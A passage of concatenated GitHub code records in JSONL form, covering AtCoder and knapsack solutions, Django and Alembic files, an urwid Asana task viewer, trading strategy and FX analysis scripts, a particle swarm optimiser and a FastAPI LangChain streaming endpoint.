b[A[i]+1] += 1\r\n b[A[i]+2] += 1\r\n dmp(b)\r\n return dmp(max(b))\r\n\r\n\r\ndebug = False # True False\r\nprint(probC())\r\n\r\ndef probCTLE2():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = zeros(10**5)\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n #dmp(hist)\r\n mxCnt = 1\r\n #keylist = list(hist.keys())\r\n #mxKey = max(keylist)\r\n # dmp(mxKey)\r\n for k in range(10**5-2):\r\n cnt = hist[k] + hist[k+1] + hist[k+2]\r\n mxCnt = max(mxCnt, cnt)\r\n return mxCnt\r\n\r\n\r\ndef probCTLE():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = {}\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n dmp(hist)\r\n mxCnt = 1\r\n keylist = list(hist.keys())\r\n mxKey = max(keylist)\r\n dmp(mxKey)\r\n for k in hist.keys():\r\n cnt = 0\r\n if k-1 in keylist:\r\n cnt += hist[k-1]\r\n if k in keylist:\r\n cnt += hist[k]\r\n if k+1 in keylist:\r\n cnt += hist[k+1]\r\n mxCnt = max(mxCnt, cnt)\r\n dmp(('max',mxCnt))\r\n return mxCnt\r\n\r\n\r\ndef probCWA():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = {}\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n dmp(hist)\r\n mxCnt = 1\r\n keylist = list(hist.keys())\r\n mxKey = max(keylist)\r\n dmp(mxKey)\r\n for i in range(mxKey-1):\r\n cnt = 0\r\n if i in keylist:\r\n cnt += hist[i]\r\n if i+1 in keylist:\r\n cnt += hist[i+1]\r\n if i+2 in keylist:\r\n cnt += hist[i+2]\r\n mxCnt = max(mxCnt, cnt)\r\n dmp(('max',mxCnt))\r\n return mxCnt","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc082/A/4273029.py","file_name":"4273029.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"5838534016","text":"from django.urls import path\n\nfrom . 
import views \n#variavel para conseguir referenciar as urls do arquivo\napp_name = \"blog\"\n#lista de padroes de url \nurlpatterns =[\n    #quando passar urls sem passar argumentos cairemos na lista de posts\n    path(\"\", views.PostListView.as_view(), name=\"list\"),\n    #quando acessarmos uma url passando o slug de um post como argumento ai acessamos a pagina desse post\n    path(\"<slug:slug>/\", views.PostDetailView.as_view(), name=\"detail\"),\n]","repo_name":"gabriellucas11/blog","sub_path":"tutorialdjango/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19009637324","text":"import urwid\nfrom datetime import date, datetime\n\nfrom ui.task_list import TaskRow\n\nclass TaskDetails(object):\n    def __init__(self, task, stories, on_subtask_click, on_project_click,\n            on_comment, on_assignee_click, on_due_date_click):\n        self.task = task\n        self.on_subtask_click = on_subtask_click\n        self.on_project_click = on_project_click\n        self.on_comment = on_comment\n\n        body = [\n            urwid.Text(('task', task.name())),\n            urwid.Divider('⎼'),\n            Memberships(task, on_subtask_click, on_project_click).component(),\n            urwid.Divider('⎼'),\n            Assignee(task, on_assignee_click).component(),\n            DueDate(task, on_due_date_click).component(),\n            CustomFields(task).component(),\n            urwid.Divider('⎼'),\n            urwid.Text(task.description()),\n            urwid.Divider('⎼'),\n        ]\n\n        if task.subtasks():\n            body.append(urwid.Pile([\n                TaskRow(t, on_subtask_click) for t in task.subtasks()\n            ]))\n\n        stories = list(stories)\n        if (len(stories) > 0):\n            body = body + [\n                urwid.Divider('-'),\n                Stories(stories).component()\n            ]\n\n        self.details = urwid.ListBox(urwid.SimpleFocusListWalker(body))\n\n    def component(self):\n        return self.details\n\nclass Assignee(object):\n    def __init__(self, task, on_click):\n        if task.assignee():\n            assignee = task.assignee().name()\n        else:\n            assignee = \"unassigned\"\n\n\n        self.assignee = urwid.SelectableIcon([('strong', 'Assignee: '), ('', assignee)])\n\n        self.on_click = on_click\n        #urwid.connect_signal(self.assignee, 'keypress', self.on_keypress)\n\n    def component(self):\n        return self.assignee\n\n    def on_keypress(self, size, key):\n        if key == \"enter\":\n            self.on_click()\n        else:\n            return key\n\nclass DueDate(object):\n    def __init__(self, task, on_click):\n        due_date = task.due_date()\n        self.due_date = urwid.SelectableIcon([('strong', 'Due: '), ('', str(task.due_date()))])\n\n        self.on_click = on_click\n        #urwid.connect_signal(self.due_date, 'keypress', self.on_keypress)\n\n    def component(self):\n        return self.due_date\n\n    def on_keypress(self, size, key):\n        if key == \"enter\":\n            self.on_click()\n        else:\n            return key\n\nclass Memberships(object):\n    def __init__(self, task, on_subtask_click, on_project_click):\n        self.on_project_click = on_project_click\n\n        components = [self.membership(p.name(), p.id()) for p in task.projects()]\n\n        if task.parent():\n            components.append(urwid.Button(\n                ('task', 'Subtask of: %s' % task.parent().name()),\n                on_press = lambda x: on_subtask_click(task.parent().id())\n            ))\n\n        self.memberships = urwid.Pile(components)\n\n    def membership(self, name, id):\n        return urwid.Button(('project', name),\n            on_press = lambda x: self.on_project_click(id)\n        )\n\n    def component(self):\n        return self.memberships\n\nclass CustomFields(object):\n    def __init__(self, task):\n        components = [urwid.Text([\n            ('custom_fields', f.name() + ': '),\n            f.string_value()\n        ]) for f in task.custom_fields()]\n\n        
self.custom_fields = urwid.Pile(components)\n\n def component(self):\n return self.custom_fields\n\nclass Stories(object):\n def __init__(self, stories):\n components = [\n urwid.Text([\n ('timestamp', s.created_at().strftime('%Y-%m-%d %H:%M')),\n ' ',\n ('author', s.creator()),\n ] + s.text())\n for s in stories]\n\n self.stories = urwid.Pile(components)\n\n def component(self):\n return self.stories\n","repo_name":"aarongut/cmdasana","sub_path":"ui/task_details.py","file_name":"task_details.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20561724285","text":"\"\"\"\nThis is an example local_settings.py, which stores custom settings,\ndifferent from project ones, provided for purpose of development.\n\nCreate a your own local settings in the `rush/local_settings.py`,\nwith the same content as here.\n\nThen, to run server with them, provide extra argument `--settings`, e.g.\n./manage.py runserver --settings=rush.local_settings\n\"\"\"\n\nfrom rush.settings import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n","repo_name":"pbajsarowicz/rush","sub_path":"rush/example_local_settings.py","file_name":"example_local_settings.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73426445354","text":"from datetime import datetime\nimport requests\n\ndef main():\n\tuser_name = str(input('Enter username: '))\n\tget_user_comments(user_name)\ndef get_user_comments(username):\n\tdict_list=[]\n\tfor i in range(100):\n\t\tr=requests.get(\"http://imgur.com/user/\"+username+\"/index/newest/page/\"\n\t\t +str(i)+\"/hit.json?scrolling\")\n\t\tpage_content=r.text\n\t\tif len(page_content) < 1:\n\t\t\tbreak\n\t\telse:\n\t\t\tcc=r.json()[\"data\"][\"captions\"][\"data\"]\n\t\t\tdict_list.append(cc)\n\t\t\tcontinue\n\textract_top_5(dict_list)\n\ndef extract_top_5(list_of_dict):\n\ttop_comments={}\n\tlist_of_top=[]\n\tfor i in list_of_dict:\n\t\tfor x in range(len(i)):\n\t\t\ti[x][\"datetime\"]=datetime.strptime(i[x][\"datetime\"],'%Y-%m-%d %H:%M:%S')\n\t\t\ttop_comments[i[x][\"points\"]] = [i[x][\"hash\"],i[x][\"title\"],i[x][\"datetime\"]]\n\n\tsorted_dict = {k : top_comments[k] for k in sorted(top_comments, reverse=True)}\n\tfirst5dict = {k: sorted_dict[k] for k in list(sorted_dict)[:5]}\n\n\tfor i in first5dict:\t\t\n\t\ttemp_dic={\"hash\":first5dict[i][0],\"Points\":i,\n\t\t \"Title\":first5dict[i][1],\"Date\":first5dict[i][2]}\n\n\t\tlist_of_top.append(temp_dic)\n\tcount=1;\n\tfor i in list_of_top:#matching format with one provided in the project example\n\t\tfor y in i:\n\t\t\tif y == 'hash':\n\t\t\t\tprint(str(count)+\".\",i[y])\n\t\t\t\tcount+=1\n\t\t\telse:\n\t\t\t\tprint(str(y)+\":\",i[y])\n\t\tprint()\n\t\t\n\treturn list_of_top\nif __name__ == '__main__':\n main()\t\n","repo_name":"Aziz-DU/Projects","sub_path":"COMP 3705 - Topics in Computer Science - Python/projects/project6/project06.py","file_name":"project06.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144845672","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 30 17:12:11 2021\n\n@author: 조은지\n\"\"\"\nimport sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\n\nlaguage = [[0,0]]\ndp = [[0]*(k+1) for _ in 
range(n+1)]\n\nfor i in range(n):\n    laguage.append(list(map(int, input().split())))\n\nfor i in range(1, n+1):\n    for j in range(1, k+1):\n        w = laguage[i][0]\n        v = laguage[i][1]\n\n        if j < w:\n            dp[i][j] = dp[i-1][j]\n        else:\n            dp[i][j] = max(dp[i-1][j], dp[i-1][j-w]+v)\n\nprint(dp[n][k])\n    ","repo_name":"eunjee/algorithmStudy","sub_path":"DP/12865.py","file_name":"12865.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38322150791","text":"# ---------------------------------- #\n# ------- DEFINE STRATEGIES -------- #\n# ---------------------------------- #\n\nfrom collections import deque\nimport backtrader as bt\nimport requests\n\n\n# enter psar, exit ema crossover (\n# entry vs. exit\n# 5min vs. 2min\n# 15min vs. 5min <-- use this one first\n# 1hr vs. 15min\nclass psarEma(bt.Strategy):\n    params = dict(emaPeriod=21, psarRate=0.02)\n\n    def __init__(self):\n        emaPeriod = self.p.emaPeriod\n\n        self.ema1data = deque([], emaPeriod)  # 5m\n        self.ema2data = deque([], emaPeriod)  # 15m\n\n        r = requests.get(\n            \"https://www.bitmex.com/api/v1/quote/bucketed?symbol=XBT&count=5&reverse=true&binSize=5m\"\n        )\n        resp = r.json()\n        print(resp)\n\n        for candle in reversed(resp):\n            self.ema1data.appendleft(candle[\"close\"])\n\n        rr = list(reversed(resp))\n        for i in range(0, len(rr), 3):\n            self.ema2data.appendleft(rr[i][\"close\"])\n\n        # TODO: subscribe to redis for live updates, update queue\n        # TODO: Send out trade\n        # TODO: PSAR\n\n        self.ema1 = bt.ind.EMA(self.data, period=self.p.emaPeriod)\n        self.psar = bt.talib.SAR(\n            self.data1.high, self.data1.low, acceleration=self.p.psarRate\n        )\n        self.crossover = bt.ind.CrossOver(self.ema1, self.data.close)\n        self.cross2 = bt.ind.CrossOver(self.data1.close, self.psar)\n\n    def next(self):\n        if self.cross2[-1] == 1:\n            if not self.position:\n                self.buy()\n        if self.cross2[-1] == -1:\n            if not self.position:\n                self.sell()\n\n        if self.position:\n            if self.position.size < 0:  # short position\n                if self.crossover[-1] == -1:\n                    self.close()\n            if self.position.size > 0:  # long position\n                if self.crossover[-1] == 1:\n                    self.close()\n\n\n# psar entry, ema crossover exit\n# ignore this - unused\nclass psarX(bt.Strategy):\n    params = dict(psarRate=0.02)\n\n    def __init__(self):\n        self.psar = bt.talib.SAR(\n            self.data.high, self.data.low, acceleration=self.p.psarRate\n        )\n        self.cross = bt.ind.CrossOver(self.data.close, self.psar)\n\n    def next(self):\n        if not self.position:\n            if self.cross == 1:\n                self.buy()\n            if self.cross == -1:\n                self.sell()\n        elif self.position:\n            if self.cross == -1:\n                self.close()\n                self.sell()\n            if self.cross == 1:\n                self.close()\n                self.buy()\n\n\n# adaptive moving average, mama and fama crossover\n# ignore that\nclass mesaX(bt.Strategy):\n    params = dict(fastx=0.5, slowx=0.05)\n\n    def __init__(self):\n        self.mesa = bt.talib.MAMA((self.data.high + self.data.low) / 2)\n        self.crossover = bt.ind.CrossOver(self.mesa.mama, self.mesa.fama)\n\n    def next(self):\n        if not self.position:\n            if self.crossover == 1:\n                self.buy()\n            if self.crossover == -1:\n                self.sell()\n        elif self.position:\n            if self.crossover == 1:\n                self.close()\n                self.buy()\n            if self.crossover == -1:\n                self.close()\n                self.sell()\n\n\n# https://github.com/mementum/backtrader/pull/374/files\n# Supertrend indicator function taken from this link\nclass SuperTrendBand(bt.Indicator):\n    \"\"\"\n    Helper indicator for Supertrend indicator\n    \"\"\"\n\n    params = ((\"period\", 7), (\"multiplier\", 3))\n    lines = (\"basic_ub\", \"basic_lb\", \"final_ub\", \"final_lb\")\n\n    def __init__(self):\n        self.atr = bt.indicators.AverageTrueRange(period=self.p.period)\n        self.l.basic_ub = ((self.data.high + self.data.low) / 2) + (\n            self.atr * self.p.multiplier\n        )\n        self.l.basic_lb = ((self.data.high + self.data.low) / 2) - (\n            self.atr * self.p.multiplier\n        )\n\n    def next(self):\n        if len(self) - 1 == self.p.period:\n            self.l.final_ub[0] = self.l.basic_ub[0]\n            self.l.final_lb[0] = self.l.basic_lb[0]\n        else:\n            # =IF(OR(basic_ub<final_ub*,close*>final_ub*),basic_ub,final_ub*)\n            if (\n                self.l.basic_ub[0] < self.l.final_ub[-1]\n                or self.data.close[-1] > self.l.final_ub[-1]\n            ):\n                self.l.final_ub[0] = self.l.basic_ub[0]\n            else:\n                self.l.final_ub[0] = self.l.final_ub[-1]\n\n            # =IF(OR(basic_lb > final_lb *, close * < final_lb *), basic_lb *, final_lb *)\n            if (\n                self.l.basic_lb[0] > self.l.final_lb[-1]\n                or self.data.close[-1] < self.l.final_lb[-1]\n            ):\n                self.l.final_lb[0] = self.l.basic_lb[0]\n            else:\n                self.l.final_lb[0] = self.l.final_lb[-1]\n\n\nclass SuperTrend(bt.Indicator):\n    \"\"\"\n    Super Trend indicator\n    \"\"\"\n\n    params = ((\"period\", 1), (\"multiplier\", 1))\n    lines = (\"super_trend\",)\n    plotinfo = dict(subplot=False)\n\n    def __init__(self):\n        self.stb = SuperTrendBand(period=self.p.period, multiplier=self.p.multiplier)\n\n    def next(self):\n        if len(self) - 1 == self.p.period:\n            self.l.super_trend[0] = self.stb.final_ub[0]\n            return\n\n        if self.l.super_trend[-1] == self.stb.final_ub[-1]:\n            if self.data.close[0] <= self.stb.final_ub[0]:\n                self.l.super_trend[0] = self.stb.final_ub[0]\n            else:\n                self.l.super_trend[0] = self.stb.final_lb[0]\n\n        if self.l.super_trend[-1] == self.stb.final_lb[-1]:\n            if self.data.close[0] >= self.stb.final_lb[0]:\n                self.l.super_trend[0] = self.stb.final_lb[0]\n            else:\n                self.l.super_trend[0] = self.stb.final_ub[0]\n\n\n#\nclass candleTrade(bt.Strategy):\n    def next(self):\n        if self.data.close[-1] > self.data.open[-1]:\n            if self.data.close[0] < self.data.open[0]:\n                if self.position:\n                    self.close()\n                    self.sell()\n                else:\n                    self.sell()\n        else:\n            if self.data.close[0] > self.data.open[0]:\n                if self.position:\n                    self.close()\n                    self.buy()\n                else:\n                    self.buy()\n\n\nclass candleShort(bt.Strategy):\n    def next(self):\n        if self.data.close[-1] > self.data.open[-1]:\n            if self.data.close[0] < self.data.open[0]:\n                if not self.position:\n                    self.sell()\n        else:\n            if self.data.close[0] > self.data.open[0]:\n                if self.position:\n                    self.close()\n\n\nclass candleLong(bt.Strategy):\n    def next(self):\n        if self.data.close[-1] > self.data.open[-1]:\n            if self.data.close[0] < self.data.open[0]:\n                if self.position:\n                    self.close()\n        else:\n            if self.data.close[0] > self.data.open[0]:\n                if not self.position:\n                    self.buy()\n\n\n# convert indicator to strategy\n# ignore\nclass superTrendX(bt.Strategy):\n    def __init__(self):\n        self.supertrend = SuperTrend(self.data)\n        self.crossover = bt.ind.CrossOver(self.supertrend, self.data.close)\n\n    def next(self):\n\n        if self.crossover == -1:\n            if self.position:\n                self.close()\n                self.buy()\n            else:\n                self.buy()\n        if self.crossover == 1:\n            if self.position:\n                self.close()\n                self.sell()\n            else:\n                self.sell()\n\n        \"\"\"if not self.position:\n            if self.crosshigh == -1:\n                self.buy()\n            if self.crosslow == 1:\n                self.sell()\n        elif self.position:\n            if self.crosshigh == -1:\n                self.close()\n                self.buy()\n            if self.crosslow == 1:\n                self.close()\n                
self.sell()\"\"\"\n","repo_name":"strader07/trading-system","sub_path":"services/pyacm/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"16676966370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 9 10:48:44 2018\r\n\r\n@author: watsapon\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('USDJPY240_1.csv')\r\ndf = df[31286:]\r\ndf = df.reset_index()\r\ndf['change'] = abs(df.close - df.open)\r\ndf['volume'] = df['volume']/100\r\ndf['move'] = df.high - df.low\r\ndf['percent_needle'] = (abs(df.change)/df.move)*100\r\n#df = df.dropna()\r\ndf['needle'] = df.move - abs(df.change)\r\n\r\nneedle_point = [1 if x > 0.125 else 0 for x in df['move'].tolist()]\r\npercent = df['percent_needle'].tolist()\r\n\r\nfor i in range(len(percent)):\r\n if percent[i] < 25 and needle_point[i] == 1 :\r\n needle_point[i] = 1\r\n else:\r\n needle_point[i] = 0\r\n\r\ndf['chk_move'] = needle_point\r\n\r\n\r\n\r\ndf2 = df[['time','volume']]\r\ndf2 = df2.sort_values(['time'])\r\n#df2 = df2.groupby(['time'])['volume'].mean()\r\n\r\n\r\nplt.scatter(df2['time'], df2['volume']) # plot graph\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('VOLUME') # label Y\r\nplt.show() # show graph\r\n\r\n#print(df2['time'].value_counts())\r\n\r\ndf2 = df2.groupby(['time'])['volume'].mean()\r\ndf2 = df2.reset_index()\r\n\r\nx = np.arange(len(df2['time']))\r\nplt.bar(x, height= df2['volume'])\r\nplt.xticks(x, df2['time']);\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('VOLUME') # label Y\r\nplt.show()\r\n\r\n\r\n\r\ndf3 = df.groupby(['time'])['change'].mean()\r\ndf3 = df3.reset_index()\r\n\r\nx = np.arange(len(df3['time']))\r\nplt.bar(x, height= df3['change'])\r\nplt.xticks(x, df3['time'])\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('MOVE_VALUE') # label Y\r\nplt.show()\r\n\r\n\r\n\r\ndf4 = df.loc[df['chk_move'] == 1]\r\nindexd_df4 = df4.index.values\r\nindexd_df4 = [x+1 for x in indexd_df4 ]\r\n#print(indexd_df4)\r\ndf5 = df.iloc[indexd_df4]\r\n#\r\nprint(df5.change.mean())\r\n\r\n#df5 = df4.loc[df4['change'] >= 0.100]\r\n\r\n\r\n\r\n","repo_name":"Slyzingbergi/Automated-trading-forex-with-AI","sub_path":"exploration/Data_Exploration.py","file_name":"Data_Exploration.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18428366191","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2021/8/16 9:24\n# @Author : doFighter\nimport numpy as np\n\n\ndef chaos(m, n, S):\n \"\"\"\n 混沌时间序列随机数生成器\n :param m: 行数指标\n :param n: 列数指标\n :param S: 混沌时间序列\n :return: 返回生成的随机数组\n \"\"\"\n index = np.ceil(np.random.rand(m, n) * 99).astype(int)\n res = S[index]\n return res\n\n\ndef TDPSO(N, dim, x_min, x_max, iterate_max, fitness):\n \"\"\"\n 完全受扰粒子群优化算法\n :param N: 种群数目\n :param dim: 问题维度\n :param x_min: 解空间下限\n :param x_max: 解空间上限\n :param iterate_max: 最大迭代次数\n :param fitness: 适应度值\n :return: 最优适应值\n \"\"\"\n # 第一步,生成混沌时间序列\n a = 1.4\n b = 0.3\n x = np.zeros(100)\n S = np.zeros(100)\n x[0] = 0\n S[0] = 0\n for i in range(1, 100):\n x[i] = S[i - 1] + 1 - a * x[i - 1] ** 2\n S[i] = b * x[i - 1]\n # 对混沌时间序列进行归一化操作\n S = S - min(S)\n S = S / max(S)\n\n c = [2.8, 1.3]\n x = x_min + (x_max - x_min) * chaos(N, dim, S)\n v_rand = np.random.rand(N, dim)\n v = (x_min - chaos(N, dim, S)) / (x_max - chaos(N, dim, S))\n v[v_rand >= 
0.5] = abs(v[v_rand >= 0.5])\n pBest = x\n # 获取初始时全局最优位置\n gBest = pBest[0, :]\n for i in range(1, N):\n if fitness(gBest) > fitness(pBest[i, :]):\n gBest = pBest[i, :]\n iterate = 0\n pBest_res = np.ones([N])\n while iterate < iterate_max:\n omega = np.power(0.5, iterate + 1) + 0.4\n v = omega * v + c[0] * np.random.rand(N, dim) * (\n pBest - x) + c[1] * np.random.rand(N, dim) * (gBest - x)\n x += v\n x[x > x_max] = x_max\n x[x < x_min] = x_min\n if iterate > iterate_max * 0.7:\n v_max = np.max(v, 0)\n # 在python中会出现数字太小,而导致除法运算的警告,因此在本算法中,对绝对值过小的数统一赋值\n v_max[(v_max > 0) & (v_max < np.exp(-60))] = np.exp(-60)\n v_max[(v_max < 0) & (v_max > -np.exp(-60))] = -np.exp(-60)\n # v_max[abs(v_max) < np.exp(-30)] = np.exp(-30)\n RVC = v / v_max\n MAX_RVC = (np.max(RVC.T, 0)).T\n position = np.array(np.where(MAX_RVC <= 0.5))[0]\n cap = np.size(position)\n for i in range(cap):\n d = np.random.choice(30, int(dim * 0.5), replace=False)\n for j in range(int(dim * 0.5)):\n flag = np.random.rand()\n if flag > 0.5:\n x[position[i], d[j]] = chaos(\n 1, 1, S)[0] + x[position[i], d[j]]\n else:\n x[position[i], d[j]] = chaos(\n 1, 1, S)[0] - x[position[i], d[j]]\n # 更新各粒子的历史最优位置\n for i in range(N):\n if fitness(pBest[i, :]) > fitness(x[i, :]):\n pBest[i, :] = x[i, :]\n pBest_res[i] = fitness(pBest[i, :])\n # 更新全局最优位置\n if pBest_res.min() < fitness(gBest):\n index = np.where(pBest_res == pBest_res.min())\n gBest = pBest[index[0][0], :]\n iterate += 1\n result = fitness(gBest)\n return result\n\n\ndef Sphere(xx):\n \"\"\"\n Sphere Function\n :param xx: 疑似最优解\n :return:适应度值\n \"\"\"\n d = len(xx)\n sum = 0\n for i in range(d):\n sum += xx[i] ** 2\n return sum\n\n\n# 函数测试\nfor i in range(10):\n result = TDPSO(20, 30, -10, 10, 1000, Sphere)\n print(result)\n","repo_name":"doFighter/Computational-intelligence","sub_path":"粒子群优化算法/完全受扰粒子群优化/code/python/TDPSO.py","file_name":"TDPSO.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"75"} +{"seq_id":"36390324715","text":"\"\"\"create table Status\n\nRevision ID: f550e61d7543\nRevises: b09e09bbf433\nCreate Date: 2023-02-05 15:37:51.716238\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f550e61d7543'\ndown_revision = 'b09e09bbf433'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'services_list', ['id'])\n op.create_unique_constraint(None, 'services_status_list', ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'services_status_list', type_='unique')\n op.drop_constraint(None, 'services_list', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"sumrak10/ServicesLog","sub_path":"ServicesLog/migrations/versions/f550e61d7543_create_table_status.py","file_name":"f550e61d7543_create_table_status.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18892235090","text":"import asyncio\nfrom typing import AsyncIterable\n\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import StreamingResponse\nfrom langchain.callbacks import AsyncIteratorCallbackHandler\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom pydantic import BaseModel\n\nload_dotenv()\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nclass Message(BaseModel):\n content: str\n\n\nasync def send_message(content: str) -> AsyncIterable[str]:\n callback = AsyncIteratorCallbackHandler()\n model = ChatOpenAI(\n streaming=True,\n verbose=True,\n callbacks=[callback],\n )\n\n task = asyncio.create_task(\n model.agenerate(messages=[[HumanMessage(content=content)]])\n )\n\n try:\n async for token in callback.aiter():\n yield token\n except Exception as e:\n print(f\"Caught exception: {e}\")\n finally:\n callback.done.set()\n\n await task\n\n\n@app.post(\"/stream_chat/\")\nasync def stream_chat(message: Message):\n generator = send_message(message.content)\n return StreamingResponse(generator, media_type=\"text/event-stream\")\n","repo_name":"Coding-Crashkurse/LangChain-FastAPI-Streaming","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"75"} +{"seq_id":"9763168647","text":"import site\nimport numpy as np\nimport os\nimport pandas as pd\n_path = os.path.dirname(os.path.abspath(__name__))\nsite.addsitedir(_path)\nimport datastore.sources as ds\n\nYTYPE = 'linear'\n# YTYPE = 'sign'\nndays_pred = 40 # working days in the future, 20 is a month?\n# CCYCCY = 'GBPUSD'\n# CCYCCY = 'CADUSD'\n# CCYCCY = 'CHFUSD'\nCCYCCY = 'CNYUSD' # interesting\nn_features = 12 \nn_history = 1\n\ndef _get_data():\n df = ds.quandl.CURRFX.get_all_cleaned()\n return df\n\ndef _get_shift_features(X):\n X = X.copy()\n # create shifts as clumsy way of getting last few days as features\n temp = list()\n for i in range(n_history):\n a = X.shift(i).copy()\n a.columns = [(*x, i) for x in a.columns]\n temp.append(a)\n temp = pd.concat(temp, axis=1)\n temp.columns = pd.MultiIndex.from_tuples(temp.columns)\n temp.columns.names = ['type', 'ccyccy', 'shift']\n temp = temp.sort_index(axis=1)\n return temp\n\ndef _get_date_features_from_index(X):\n X['day'] = X.index.day\n X['weekday'] = X.index.weekday\n return X\n\ntry:\n df\nexcept NameError as e:\n df = _get_data()\n\ndf = df.sort_index()\n# TODO add more features\ntemp = [df]\nfor i in [1, 2, 3, 4, 5, 10, 15, 20, 30, 40, 50, 60, 120]:\n df_diff = df.diff(periods=i)\n df_diff.columns = [(x[0] + ' diff {}'.format(i), x[1]) for x in df_diff.columns]\n temp.append(df_diff)\ndf_allfeatures = pd.concat(temp, axis=1)\n\n# i.e. 
[('High (est)', 'GBPUSD'), ('Low (est)', 'GBPUSD'), ('Rate', 'GBPUSD')]\npredcols = [x for x in df_allfeatures.columns if x[1] == CCYCCY]\npredcols_renamed = [(x[0] + ' pred', x[1]) for x in predcols]\n# confusing but keep the original, unshifted cols there\ndf_allfeatures[predcols_renamed] = df_allfeatures[predcols].shift(ndays_pred).copy()\ndf_allfeatures = df_allfeatures.dropna(subset=predcols_renamed)\n# y = df_allfeatures[predcols].iloc[:,0] # TODO, need to do these separately\ny_colname = ('Rate diff {} pred'.format(ndays_pred), CCYCCY)\ny = df_allfeatures[y_colname] # DO NOT FORGET ' pred' suffix !!!!\nif YTYPE == 'sign':\n y = y > 0\nX_raw = df_allfeatures.copy()\n# X_raw = X_raw.drop(predcols_renamed, axis=1)\nX_raw = X_raw[predcols]\nX = _get_shift_features(X_raw)\nX = _get_date_features_from_index(X)\n\n# xgboost not like MultiIndex cols\nX.columns = ['_'.join(map(str, x)) for x in X.columns]\n\nfrom sklearn.cross_validation import train_test_split\n# no do future vs past\n# y_train, X_train, y_test, X_test = train_test_split(y, X, test_size=0.3)\nn_test = round(X.shape[0] * 0.3)\nind = np.arange(X.shape[0])\ny_train, X_train, y_test, X_test, ind_train, ind_test = y.iloc[:-n_test], X.iloc[:-n_test], y.iloc[-n_test:], X.iloc[-n_test:], ind[:-n_test], ind[-n_test:]\n\nX_fit, X_eval, y_fit, y_eval, ind_fit, ind_eval = train_test_split(X_train, y_train, ind_train, test_size=0.3)\n\nprint('shapes', y.shape, X.shape, y_train.shape, X_train.shape, y_test.shape, X_test.shape)\n\n# feature importance/selection\nimport sklearn.ensemble as se\nif YTYPE == 'linear':\n etr = se.ExtraTreesRegressor(bootstrap=True, criterion='mse', max_depth=3,\n max_features='auto', max_leaf_nodes=None, min_samples_leaf=5, min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=1, oob_score=True, random_state=None, verbose=0, warm_start=False)\n etr.fit(X_fit.fillna(method='ffill').fillna(0), y_fit)\nelif YTYPE == 'sign':\n etr = se.ExtraTreesClassifier(bootstrap=True, class_weight=None, criterion='gini', max_depth=3,\n max_features='auto', max_leaf_nodes=None, min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=100, n_jobs=-1, oob_score=True, random_state=None,\n verbose=1, 